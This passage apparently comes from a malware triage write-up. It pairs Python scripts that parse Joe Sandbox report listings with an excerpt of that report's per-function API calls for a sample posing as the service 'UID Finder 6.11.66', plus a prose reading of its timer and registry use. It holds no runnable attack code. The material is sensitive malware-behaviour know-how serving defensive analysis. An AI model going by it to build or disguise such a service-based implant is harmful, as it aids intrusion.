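MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}
HKEY = {0x80000001: "HKEY_CURRENT_USER", 0x80000002: "HKEY_LOCAL_MACHINE"}

SDMP_RE = re.compile(r"Source File: (\S+\.sdmp), Offset: ([0-9A-F]+), based on PE: (true|false)")
API_RE = re.compile(r"^•\s+(?:Part of subcall function [0-9A-F]+:\s+)?"
                    r"(\w+)\.(\w+)(?:\(([^)]*)\))?,?\s+ref:\s+([0-9A-F]+)$")


@dataclass
class Entry:
    sdmp: str = ""
    base: int = 0
    protect: int = 0
    mem_type: str = "?"
    based_on_pe: bool = False
    yara: bool = False
    apis: list = field(default_factory=list)  # (name, module, args, ref)

    def is_unpacked_code(self) -> bool:
        """Executable private memory not backed by a PE is where unpacked payloads run."""
        return self.mem_type == "MEM_PRIVATE" and self.protect in PAGE_EXEC and not self.based_on_pe

    def notes(self) -> list:
        """Decode the argument values the report shows in the clear."""
        out = []
        for name, _mod, args, _ref in self.apis:
            argv = (args or "").split(",")
            if name == "SetWaitableTimer" and len(argv) >= 3 and argv[2] != "?":
                out.append(f"SetWaitableTimer period {int(argv[2], 16)} ms")   # 3rd arg = lPeriod
            if name.startswith("RegCreateKeyEx") and argv and argv[0] != "?":
                out.append(f"RegCreateKeyEx root {HKEY.get(int(argv[0], 16), argv[0])}")
        return out


def decode_sdmp(name: str):
    """Split an .sdmp name into its fields (layout assumed, see module docstring)."""
    parts = name[:-len(".sdmp")].split(".")
    if len(parts) != 8:
        return None
    return {"proc": int(parts[0], 16), "stage": int(parts[1], 16), "base": int(parts[3], 16),
            "protect": int(parts[4], 16), "mem_type": MEM_TYPE.get(int(parts[6], 16), parts[6])}


def parse_entries(text: str) -> list:
    """One Entry per function record; a record starts at 'APIs' or at a bare 'Memory Dump Source'."""
    entries, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs" or (line == "Memory Dump Source" and (cur is None or cur.sdmp)):
            cur = Entry()
            entries.append(cur)
        elif cur is None:
            continue
        elif line == "Yara matches":
            cur.yara = True
        elif (m := SDMP_RE.search(line)):
            cur.sdmp, cur.based_on_pe = m.group(1), m.group(3) == "true"
            if (d := decode_sdmp(cur.sdmp)):
                cur.base, cur.protect, cur.mem_type = d["base"], d["protect"], d["mem_type"]
        elif (m := API_RE.match(line)):
            cur.apis.append((m.group(1), m.group(2), m.group(3), m.group(4)))
    return entries


def triage(text: str) -> list:
    """Flatten entries into rows an analyst can sort: unpacked-code regions first."""
    return [{"base": f"{e.base:08X}", "mem_type": e.mem_type, "unpacked": e.is_unpacked_code(),
             "yara": e.yara, "apis": sorted({n for n, *_ in e.apis}), "notes": e.notes()}
            for e in parse_entries(text)]


# Constructed sample: two entries copied from the report (one private-memory, one image-backed).
SAMPLE = """
APIs
• __EH_prolog.LIBCMT ref: 0260E504
  • Part of subcall function 026026DB: RtlEnterCriticalSection.NTDLL(?), ref: 02602706
  • Part of subcall function 026026DB: CreateWaitableTimerA.KERNEL32(00000000,00000000,00000000), ref: 0260272B
  • Part of subcall function 026026DB: SetWaitableTimer.KERNELBASE(?,?,000493E0,00000000,00000000,00000000), ref: 02602778
  • Part of subcall function 026026DB: RtlLeaveCriticalSection.NTDLL(?), ref: 026027D9
Memory Dump Source
• Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
Joe Sandbox IDA Plugin
Yara matches
Similarity
• API ID: CriticalSectionTimerWaitable$CreateEnterErrorH_prologLastLeave
APIs
• RegCreateKeyExA.KERNELBASE(80000002), ref: 0040D82C
Memory Dump Source
• Source File: 00000004.00000002.3269066379.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: Create
"""

if __name__ == "__main__":
    for row in triage(SAMPLE):
        print(row)
```

Run against the full report text, the rows with `unpacked` and `yara` set are the functions worth opening in the unpacked dump first. The decoded `lPeriod` of 0x493E0 is 300000 ms, a 5-minute periodic timer armed inside a critical section, which is the shape of a scheduled-task or beacon loop; the `RegCreateKeyExA` call in the original image is rooted at `HKEY_LOCAL_MACHINE`, so it only succeeds from an elevated process.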
                                                                                      APIs
                                                                                      • __EH_prolog.LIBCMT ref: 0260E2E3
                                                                                        • Part of subcall function 02613AFC: _malloc.LIBCMT ref: 02613B14
                                                                                        • Part of subcall function 0260E4FF: __EH_prolog.LIBCMT ref: 0260E504
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: H_prolog$_malloc
                                                                                      • String ID:
                                                                                      • API String ID: 4254904621-0
                                                                                      • Opcode ID: b5fbf4b35f72634b2089dbe9e8a4f37904457ca99e07c18c29e1aded8c464540
                                                                                      • Instruction ID: 5ddf41e41c2076d0eb113d569676daa68a868f7bccf3f8b7a48d6f4abdaa1c30
                                                                                      • Opcode Fuzzy Hash: b5fbf4b35f72634b2089dbe9e8a4f37904457ca99e07c18c29e1aded8c464540
                                                                                      • Instruction Fuzzy Hash: F8E0C270A40625AFDF0CEF6CD91173E77AAEB08300F0045ADB809D2380EF7199009F08
                                                                                      APIs
                                                                                        • Part of subcall function 02615C0A: __getptd_noexit.LIBCMT ref: 02615C0B
                                                                                        • Part of subcall function 02615C0A: __amsg_exit.LIBCMT ref: 02615C18
                                                                                        • Part of subcall function 02613443: __getptd_noexit.LIBCMT ref: 02613447
                                                                                        • Part of subcall function 02613443: __freeptd.LIBCMT ref: 02613461
                                                                                        • Part of subcall function 02613443: RtlExitUserThread.NTDLL(?,00000000,?,02613423,00000000), ref: 0261346A
                                                                                      • __XcptFilter.LIBCMT ref: 0261342F
                                                                                        • Part of subcall function 02618D44: __getptd_noexit.LIBCMT ref: 02618D48
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: __getptd_noexit$ExitFilterThreadUserXcpt__amsg_exit__freeptd
                                                                                      • String ID:
                                                                                      • API String ID: 1405322794-0
                                                                                      • Opcode ID: 9a12f866ee62a4b532ea68f634c6df4d7238a21a327dcba9caf0b9c229f5bfd2
                                                                                      • Instruction ID: 41da08776fb4c93205925eec950badd34b759bd7efaaa407177a8fea3c3f583c
                                                                                      • Opcode Fuzzy Hash: 9a12f866ee62a4b532ea68f634c6df4d7238a21a327dcba9caf0b9c229f5bfd2
                                                                                      • Instruction Fuzzy Hash: BAE0ECB5D006009FEB08ABA4D945F2D7766EF44711F25019DE1029B2A1CA74A9509E29
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.000000000263A000.00000040.00001000.00020000.00000000.sdmp, Offset: 0263A000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_263a000_recordpadsoundrecorder32.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateFile
                                                                                      • String ID:
                                                                                      • API String ID: 823142352-0
                                                                                      • Opcode ID: 64c95028912b64b1a7f3bb0a0c1d362540dfa8fb1010e2c736b2a999a9d2fce2
                                                                                      • Instruction ID: ffb33abb336c0e68498976b499813a249a158ec831f28e13df72c8f351180eea
                                                                                      • Opcode Fuzzy Hash: 64c95028912b64b1a7f3bb0a0c1d362540dfa8fb1010e2c736b2a999a9d2fce2
                                                                                      • Instruction Fuzzy Hash: 70D05BF2C0C108EBD7153644EC0573FB760AB15240F0A0528D7C602300F5375A3ACAC7
                                                                                      APIs
                                                                                      • LoadLibraryExA.KERNELBASE(?,00000000), ref: 0040DAAA
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3269066379.000000000040B000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3269066379.0000000000400000.00000040.00000001.01000000.00000008.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_400000_recordpadsoundrecorder32.jbxd
                                                                                      Similarity
                                                                                      • API ID: LibraryLoad
                                                                                      • String ID:
                                                                                      • API String ID: 1029625771-0
                                                                                      • Opcode ID: cb0e7b76a640d08c499b35eeede7cfcdb4648d5495989a2d1e2ae0225391a306
                                                                                      • Instruction ID: c516dca2397b2fac07020e058ced903cfa4834765396f8b763ac0801263e45c8
                                                                                      • Opcode Fuzzy Hash: cb0e7b76a640d08c499b35eeede7cfcdb4648d5495989a2d1e2ae0225391a306
                                                                                      • Instruction Fuzzy Hash: 29C01234614115DFD7005F74CD447653B70FF05740F000626A442A5190DB7484065A15
                                                                                      APIs
                                                                                      • RegCreateKeyExA.KERNELBASE(80000002), ref: 0040D82C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3269066379.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3269066379.000000000040B000.00000040.00000001.01000000.00000008.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_400000_recordpadsoundrecorder32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Create
                                                                                      • String ID:
                                                                                      • API String ID: 2289755597-0
                                                                                      • Opcode ID: eaf145f444873a6bff26022e61706261e4d44663e084ce3b01c6962bc98f21b3
                                                                                      • Instruction ID: 5ec97b2eb3e3170ad95daf285be8c754b41faf33349fba5b10927a7075397fb8
                                                                                      • Opcode Fuzzy Hash: eaf145f444873a6bff26022e61706261e4d44663e084ce3b01c6962bc98f21b3
                                                                                      • Instruction Fuzzy Hash: 58C08C20A08218D8D7D01AE52E0C7AE2A06AB043B4F30032AA633730C0CB348082A6BE
                                                                                      APIs
                                                                                        • Part of subcall function 026115C0: OpenEventA.KERNEL32(00100002,00000000,00000000,3DC92DE0), ref: 02611660
                                                                                        • Part of subcall function 026115C0: CloseHandle.KERNEL32(00000000), ref: 02611675
                                                                                        • Part of subcall function 026115C0: ResetEvent.KERNEL32(00000000,3DC92DE0), ref: 0261167F
                                                                                        • Part of subcall function 026115C0: CloseHandle.KERNEL32(00000000,3DC92DE0), ref: 026116B4
                                                                                      • TlsSetValue.KERNEL32(00000026,?), ref: 0261215A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CloseEventHandle$OpenResetValue
                                                                                      • String ID:
                                                                                      • API String ID: 1556185888-0
                                                                                      • Opcode ID: f91e473dedcaa7f4fe77bbbce5e8ce1be74b7f476ed4c8c6a995a30b8a0dee7b
                                                                                      • Instruction ID: 19096a2d2bd363df14516c777c5421ef62c87876e3f72cb045201ffe4667aaaa
                                                                                      • Opcode Fuzzy Hash: f91e473dedcaa7f4fe77bbbce5e8ce1be74b7f476ed4c8c6a995a30b8a0dee7b
                                                                                      • Instruction Fuzzy Hash: 0801DF71A00244ABD300CF98D905F5EBBA8FB06660F104B6AF925D3380D77169108AA4
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3269066379.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3269066379.000000000040B000.00000040.00000001.01000000.00000008.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_400000_recordpadsoundrecorder32.jbxd
                                                                                      Similarity
                                                                                      • API ID: AllocVirtual
                                                                                      • String ID:
                                                                                      • API String ID: 4275171209-0
                                                                                      • Opcode ID: 57a0741227dd9a16cd461ae8e65421ddc13f5886cd6de5791e0686322d83ea60
                                                                                      • Instruction ID: 646227f3fef1f343ab71bcb68da16975c72f4075c55f098b44a112a7cca5064b
                                                                                      • Opcode Fuzzy Hash: 57a0741227dd9a16cd461ae8e65421ddc13f5886cd6de5791e0686322d83ea60
                                                                                      • Instruction Fuzzy Hash: FCE08C31800701EBC7014BA0CA8A6AABBB0BB00314F00803AE809725C0C3BC91AACBDA
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3269066379.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3269066379.000000000040B000.00000040.00000001.01000000.00000008.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_400000_recordpadsoundrecorder32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Sleep
                                                                                      • String ID:
                                                                                      • API String ID: 3472027048-0
                                                                                      • Opcode ID: b4fe005c8e16b858d01d95fa0fd3f8ef258010f6ac9604675fd7048b94773a9b
                                                                                      • Instruction ID: e72a41b6dfdddac10ecd88bf8a051ea5708ec34d9fa41edd5dfe4d5b4977cec8
                                                                                      • Opcode Fuzzy Hash: b4fe005c8e16b858d01d95fa0fd3f8ef258010f6ac9604675fd7048b94773a9b
                                                                                      • Instruction Fuzzy Hash: D7C08C7880D800F2D20113502F0DBB83224A706308F30403BF806300D14AFE012BA98F
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3269066379.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3269066379.000000000040B000.00000040.00000001.01000000.00000008.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_400000_recordpadsoundrecorder32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Sleep
                                                                                      • String ID:
                                                                                      • API String ID: 3472027048-0
                                                                                      • Opcode ID: e68fd7fce66a6d94e974ea7a7509de7a7ac7b8a460bc7d90a9001f94097f8646
                                                                                      • Instruction ID: 5f572b3b01697d3602dd085a38fc554daa16ccd5b5a82f5d4f3345458a6bfba9
                                                                                      • Opcode Fuzzy Hash: e68fd7fce66a6d94e974ea7a7509de7a7ac7b8a460bc7d90a9001f94097f8646
                                                                                      • Instruction Fuzzy Hash: A1B01130888800EAC2000BA0AE08B303E30B30030AF20003AAA0A300E08A3A088EAA0F
                                                                                      APIs
                                                                                        • Part of subcall function 02609A87: __EH_prolog.LIBCMT ref: 02609A8C
                                                                                        • Part of subcall function 02609A87: _Allocate.LIBCPMT ref: 02609AE3
                                                                                        • Part of subcall function 02609A87: _memmove.LIBCMT ref: 02609B3A
                                                                                      • _memset.LIBCMT ref: 026108E9
                                                                                      • FormatMessageA.KERNEL32(00001200,00000000,?,00000400,?,00000010,00000000), ref: 02610952
                                                                                      • GetLastError.KERNEL32(?,00000400,?,00000010,00000000), ref: 0261095A
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: AllocateErrorFormatH_prologLastMessage_memmove_memset
                                                                                      • String ID: Unknown error$invalid string position
                                                                                      • API String ID: 1854462395-1837348584
                                                                                      • Opcode ID: 0f684700639d8c4b38261c52dbdefd49bc7d7c398a3f9fd34df818f200f0ee3e
                                                                                      • Instruction ID: 6f298285b00bdaa28659dc76ab02e6eb6550208a371f4aa9e2b3f77fbc0362dd
                                                                                      • Opcode Fuzzy Hash: 0f684700639d8c4b38261c52dbdefd49bc7d7c398a3f9fd34df818f200f0ee3e
                                                                                      • Instruction Fuzzy Hash: B451AC70208341DFEB14CF25C890B2FBBE5AB98704F58092DF88697292D771E588CF56
                                                                                      APIs
                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,02614E46,?,?,?,00000000), ref: 026194DD
                                                                                      • UnhandledExceptionFilter.KERNEL32(?,?,?,00000000), ref: 026194E6
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ExceptionFilterUnhandled
                                                                                      • String ID:
                                                                                      • API String ID: 3192549508-0
                                                                                      • Opcode ID: 7d2ddb7cf950a667763b6522d318ad4964a8233e1767f61908af44f4aefdd77e
                                                                                      • Instruction ID: 890d5daa9540d13e9c862efc83efe1012cddaf1820cc2c00723f88d949afd423
                                                                                      • Opcode Fuzzy Hash: 7d2ddb7cf950a667763b6522d318ad4964a8233e1767f61908af44f4aefdd77e
                                                                                      • Instruction Fuzzy Hash: EFB09271484648EBCB222F91EC09F8DBF28EB04666F015810F60D440508B6254AC9AA1
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: _memset
                                                                                      • String ID:
                                                                                      • API String ID: 2102423945-0
                                                                                      • Opcode ID: 50ed358c2bc5baa28b61a63f85c8bcfb39f11c9cdbb9bf2bbec23c38127e8fb6
                                                                                      • Instruction ID: 8e04df25bb5740225020da62a65895cb65bf947b2b22d0d747a80ab51bd07e84
                                                                                      • Opcode Fuzzy Hash: 50ed358c2bc5baa28b61a63f85c8bcfb39f11c9cdbb9bf2bbec23c38127e8fb6
                                                                                      • Instruction Fuzzy Hash: F6F082B1904309AAD714DF95D942B9DFBB8EF85310F208169D508A7380E6B07A118B94
                                                                                      APIs
                                                                                      • __EH_prolog.LIBCMT ref: 026024E6
                                                                                      • InterlockedCompareExchange.KERNEL32(?,00000000,00000001), ref: 026024FC
                                                                                      • RtlEnterCriticalSection.NTDLL(?), ref: 0260250E
                                                                                      • RtlLeaveCriticalSection.NTDLL(?), ref: 0260256D
                                                                                      • SetLastError.KERNEL32(00000000,?,7591DFB0), ref: 0260257F
                                                                                      • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000001F4,?,7591DFB0), ref: 02602599
                                                                                      • GetLastError.KERNEL32(?,7591DFB0), ref: 026025A2
                                                                                      • InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 026025F0
                                                                                      • InterlockedDecrement.KERNEL32(00000002), ref: 0260262F
                                                                                      • InterlockedExchange.KERNEL32(00000000,00000000), ref: 0260268E
                                                                                      • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02602699
                                                                                      • InterlockedExchange.KERNEL32(00000000,00000001), ref: 026026AD
                                                                                      • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,00000000,?,7591DFB0), ref: 026026BD
                                                                                      • GetLastError.KERNEL32(?,7591DFB0), ref: 026026C7
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Interlocked$Exchange$ErrorLast$CompareCompletionCriticalQueuedSectionStatus$DecrementEnterH_prologLeavePost
                                                                                      • String ID:
                                                                                      • API String ID: 1213838671-0
                                                                                      • Opcode ID: 4aaf6431a86a3e1b64adb0ac6cacf79278b3423449d869d3d4f8b0d8db8643b2
                                                                                      • Instruction ID: df9ea847d0edebaebcbe7e512d83d6d9427f3f821ec5fd8bb106a10232721501
                                                                                      • Opcode Fuzzy Hash: 4aaf6431a86a3e1b64adb0ac6cacf79278b3423449d869d3d4f8b0d8db8643b2
                                                                                      • Instruction Fuzzy Hash: D4612DB1940609AFCB15DFA4D598EAFFBB9FF08310F144569E906E3280D730A958DF64
                                                                                      APIs
                                                                                      • __EH_prolog.LIBCMT ref: 02604608
                                                                                        • Part of subcall function 02613AFC: _malloc.LIBCMT ref: 02613B14
                                                                                      • htons.WS2_32(?), ref: 02604669
                                                                                      • htonl.WS2_32(?), ref: 0260468C
                                                                                      • htonl.WS2_32(00000000), ref: 02604693
                                                                                      • htons.WS2_32(00000000), ref: 02604747
                                                                                      • _sprintf.LIBCMT ref: 0260475D
                                                                                        • Part of subcall function 0260893A: _memmove.LIBCMT ref: 0260895A
                                                                                      • htons.WS2_32(?), ref: 026046B0
                                                                                        • Part of subcall function 026096E5: __EH_prolog.LIBCMT ref: 026096EA
                                                                                        • Part of subcall function 026096E5: RtlEnterCriticalSection.NTDLL(00000020), ref: 02609765
                                                                                        • Part of subcall function 026096E5: RtlLeaveCriticalSection.NTDLL(00000020), ref: 02609783
                                                                                        • Part of subcall function 02601BA7: __EH_prolog.LIBCMT ref: 02601BAC
                                                                                        • Part of subcall function 02601BA7: RtlEnterCriticalSection.NTDLL ref: 02601BBC
                                                                                        • Part of subcall function 02601BA7: RtlLeaveCriticalSection.NTDLL ref: 02601BEA
                                                                                        • Part of subcall function 02601BA7: RtlEnterCriticalSection.NTDLL ref: 02601C13
                                                                                        • Part of subcall function 02601BA7: RtlLeaveCriticalSection.NTDLL ref: 02601C56
                                                                                        • Part of subcall function 0260DEA1: __EH_prolog.LIBCMT ref: 0260DEA6
                                                                                      • htonl.WS2_32(?), ref: 0260497C
                                                                                      • htonl.WS2_32(00000000), ref: 02604983
                                                                                      • htonl.WS2_32(00000000), ref: 026049C8
                                                                                      • htonl.WS2_32(00000000), ref: 026049CF
                                                                                      • htons.WS2_32(?), ref: 026049EF
                                                                                      • htons.WS2_32(?), ref: 026049F9
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CriticalSectionhtonl$htons$H_prolog$EnterLeave$_malloc_memmove_sprintf
                                                                                      • String ID:
                                                                                      • API String ID: 1645262487-0
                                                                                      • Opcode ID: 9e0d540f90fa3de2a03f5086b5caace14a72c237cbe699e890eb2afab183ec04
                                                                                      • Instruction ID: c986a745f4a64e9cb21b0b5e06b72395aa62d6724c92394f1b329d065619daf1
                                                                                      • Opcode Fuzzy Hash: 9e0d540f90fa3de2a03f5086b5caace14a72c237cbe699e890eb2afab183ec04
                                                                                      • Instruction Fuzzy Hash: 16026C71C00259EFDF29DBE4C884BEEBBB9AF04304F10459AE505B7280DB705A89DFA5
                                                                                      APIs
                                                                                      • RegisterServiceCtrlHandlerA.ADVAPI32(UID Finder 6.11.66,Function_0000235E), ref: 004023C1
                                                                                      • SetServiceStatus.ADVAPI32(0040C408), ref: 00402420
                                                                                      • GetLastError.KERNEL32 ref: 00402422
                                                                                      • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 0040242F
                                                                                      • GetLastError.KERNEL32 ref: 00402450
                                                                                      • SetServiceStatus.ADVAPI32(0040C408), ref: 00402480
                                                                                      • CreateThread.KERNEL32(00000000,00000000,Function_000022CB,00000000,00000000,00000000), ref: 0040248C
                                                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00402495
                                                                                      • CloseHandle.KERNEL32 ref: 004024A1
                                                                                      • SetServiceStatus.ADVAPI32(0040C408), ref: 004024CA
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3269066379.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3269066379.000000000040B000.00000040.00000001.01000000.00000008.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_400000_recordpadsoundrecorder32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Service$Status$CreateErrorLast$CloseCtrlEventHandleHandlerObjectRegisterSingleThreadWait
                                                                                      • String ID: UID Finder 6.11.66
                                                                                      • API String ID: 3346042915-245170862
                                                                                      • Opcode ID: 8481bbef3285b0f9ebce9f82f4e1eb68b4ac82d1f0eae4c5cd12d91383da07eb
                                                                                      • Instruction ID: 4f107cf957cbd680cd4d605db27ce117804603c61eb7b626b01e69dba3e91430
                                                                                      • Opcode Fuzzy Hash: 8481bbef3285b0f9ebce9f82f4e1eb68b4ac82d1f0eae4c5cd12d91383da07eb
                                                                                      • Instruction Fuzzy Hash: 3521C570441214EBC2105F16EFE9A267FA8FBC5794B11823EE544B22B2CBB90549CFAD
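The per-function listings above (API calls with call-site addresses, followed by Source File, API ID, String ID and Opcode ID) are what an analyst usually scrapes out of a report like this to recover call sequences, for instance the service-main routine just above that registers a control handler for "UID Finder 6.11.66" and the IOCP worker loop earlier in the section. The following is an added example, not code from the Joe Sandbox report or its IDA plugin: a small parser that turns each entry into an ordered API sequence and flags a few call-pattern signatures. The regular expressions and the PATTERNS table are this example's own assumptions about the listing layout; the sample text is a constructed, trimmed copy of two entries from this page.

```python
# Added example (not Joe Sandbox code): parse the report's per-function
# listings into API call sequences. Regexes and PATTERNS are assumptions.
import re
from dataclasses import dataclass, field

API_LINE = re.compile(
    r"^\s*•\s*(?P<sub>Part of subcall function [0-9A-F]+:\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<mod>[A-Z0-9_]+)"
    r"(?:\((?P<args>.*?)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})"
)
# Only these metadata fields are kept; "API String ID" and hashes fall through.
FIELD_LINE = re.compile(
    r"^\s*•\s*(?P<key>Source File|API ID|String ID|Opcode ID):\s*(?P<val>.*)$"
)

@dataclass
class Call:
    api: str
    module: str
    args: tuple
    ref: int          # call-site address from "ref: XXXXXXXX"
    subcall: bool     # True for "Part of subcall function ..." lines

@dataclass
class FunctionEntry:
    opcode_id: str = ""
    source_file: str = ""
    api_id: str = ""
    string_id: str = ""
    calls: list = field(default_factory=list)

def parse_listing(text):
    """Split the listing at each 'APIs' header and collect one entry per function."""
    entries, current = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":
            current = FunctionEntry()
            entries.append(current)
            continue
        if current is None:
            continue
        m = API_LINE.match(line)
        if m:
            args = tuple(a.strip() for a in m["args"].split(",")) if m["args"] else ()
            current.calls.append(
                Call(m["api"], m["mod"], args, int(m["ref"], 16), bool(m["sub"])))
            continue
        m = FIELD_LINE.match(line)
        if m:
            key, val = m["key"], m["val"].strip()
            if key == "Source File":
                current.source_file = val.split(",")[0]   # drop ", Offset: ..."
            else:
                setattr(current, key.lower().replace(" ", "_"), val)
    return entries

def api_sequence(entry, include_subcalls=False):
    """API names in call-site address order; subcall lines excluded by default."""
    calls = [c for c in entry.calls if include_subcalls or not c.subcall]
    return [c.api for c in sorted(calls, key=lambda c: c.ref)]

def service_name(entry):
    """First argument of RegisterServiceCtrlHandlerA: the service name the code expects."""
    for c in entry.calls:
        if c.api == "RegisterServiceCtrlHandlerA" and c.args:
            return c.args[0]
    return None

# Assumed call-pattern signatures: every listed API must appear as a direct call.
PATTERNS = {
    "service-main": {"RegisterServiceCtrlHandlerA", "SetServiceStatus", "CreateThread"},
    "iocp-worker": {"GetQueuedCompletionStatus", "PostQueuedCompletionStatus"},
    "seh-filter-setup": {"SetUnhandledExceptionFilter", "UnhandledExceptionFilter"},
}

def classify(entry):
    direct = set(api_sequence(entry))
    return [name for name, needed in PATTERNS.items() if needed <= direct]

# Constructed sample: trimmed copies of two entries from the listing above.
SAMPLE = """APIs
• RegisterServiceCtrlHandlerA.ADVAPI32(UID Finder 6.11.66,Function_0000235E), ref: 004023C1
• SetServiceStatus.ADVAPI32(0040C408), ref: 00402420
• CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 0040242F
• CreateThread.KERNEL32(00000000,00000000,Function_000022CB,00000000,00000000,00000000), ref: 0040248C
• WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00402495
• Source File: 00000004.00000002.3269066379.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• API ID: Service$Status$CreateErrorLast$CloseCtrlEventHandleHandlerObjectRegisterSingleThreadWait
• String ID: UID Finder 6.11.66
• API String ID: 3346042915-245170862
• Opcode ID: 8481bbef3285b0f9ebce9f82f4e1eb68b4ac82d1f0eae4c5cd12d91383da07eb
APIs
• __EH_prolog.LIBCMT ref: 026024E6
• GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000001F4,?,7591DFB0), ref: 02602599
• PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,00000000,?,7591DFB0), ref: 026026BD
• Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
• String ID:
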